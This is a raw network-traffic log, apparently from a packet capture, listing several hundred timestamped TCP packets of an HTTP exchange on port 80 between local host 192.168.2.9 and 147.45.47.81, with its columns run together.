                                                                                                                                                                                Nov 10, 2024 09:18:26.714152098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.761626959 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.765882969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.765919924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.765933990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.765950918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.766007900 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.766031027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.779989958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780006886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780024052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780164003 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780211926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780227900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780245066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780262947 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780271053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780292988 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780356884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780371904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780401945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780411959 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780417919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780435085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780451059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780457020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780471087 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780723095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780776978 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780791998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780807972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780834913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.780849934 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.780981064 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781004906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781021118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781028986 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781035900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781053066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781075954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781101942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781243086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781287909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781302929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781317949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781333923 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781388998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781478882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781548023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781570911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781585932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781600952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781622887 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781622887 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781625032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781640053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781662941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781680107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781687975 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781696081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.781698942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.781737089 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.782141924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.782165051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.782181025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.782196045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.782212973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.782217026 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.782242060 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.824106932 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.829516888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829559088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829576015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829595089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829617023 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.829626083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829638958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829662085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829662085 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.829674959 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.829694033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829715014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.829731941 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.870969057 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.881592989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.881660938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.881675959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.881710052 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.895472050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895490885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895505905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895558119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.895558119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.895824909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895850897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895868063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895905018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.895911932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895926952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895941973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.895972967 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896059990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896076918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896090984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896111012 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896142960 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896166086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896210909 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896224976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896239042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896260977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896295071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896408081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896449089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896464109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896496058 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896509886 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896564007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896619081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896657944 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896660089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896683931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896723986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896748066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896764994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.896778107 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896778107 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.896781921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897072077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897087097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897104025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897123098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897130013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897144079 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897146940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897171974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897186995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897202969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897209883 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897209883 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897574902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897591114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897614002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897629976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897634029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897634029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897646904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897680044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897842884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897876024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897892952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897907972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897913933 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897926092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.897948980 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.897964954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.939173937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.939237118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.939296961 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.945133924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945188046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945202112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945220947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945245981 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.945255995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945271015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945283890 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.945322037 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.945388079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945403099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945429087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945437908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.945481062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.945498943 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.997219086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.997239113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.997255087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.997322083 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.011204004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011220932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011238098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011291981 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.011291981 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.011426926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011450052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011465073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011482000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011502981 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.011534929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011552095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011575937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011583090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.011593103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011600971 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.011666059 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.011816025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011842012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011861086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.011910915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012099981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012115955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012132883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012150049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012167931 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012167931 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012173891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012238979 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012239933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012280941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012296915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012332916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012428045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012443066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012459040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012495041 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012495995 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012505054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012521029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012564898 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012756109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012773037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012795925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012819052 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012860060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012876987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012891054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012904882 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012908936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012932062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012953997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012968063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.012969017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.012969017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.013022900 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.013520956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013537884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013554096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013571978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013605118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013609886 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.013627052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013633966 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.013643980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013659000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.013710022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.013710022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.071255922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071280956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071297884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071321011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071335077 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.071336985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071368933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071386099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071400881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071408033 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.071408033 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.071417093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071439028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.071455002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.071502924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.112772942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.112790108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.112806082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.112823963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.113009930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.126879930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.126895905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.126915932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.126980066 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127053022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127120972 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127175093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127190113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127204895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127223015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127238035 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127245903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127263069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127310991 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127310991 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127407074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127470016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127515078 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127640009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127665997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127681971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127717018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127790928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127806902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127823114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.127867937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127867937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.127912045 CET8049833147.45.47.81192.168.2.9
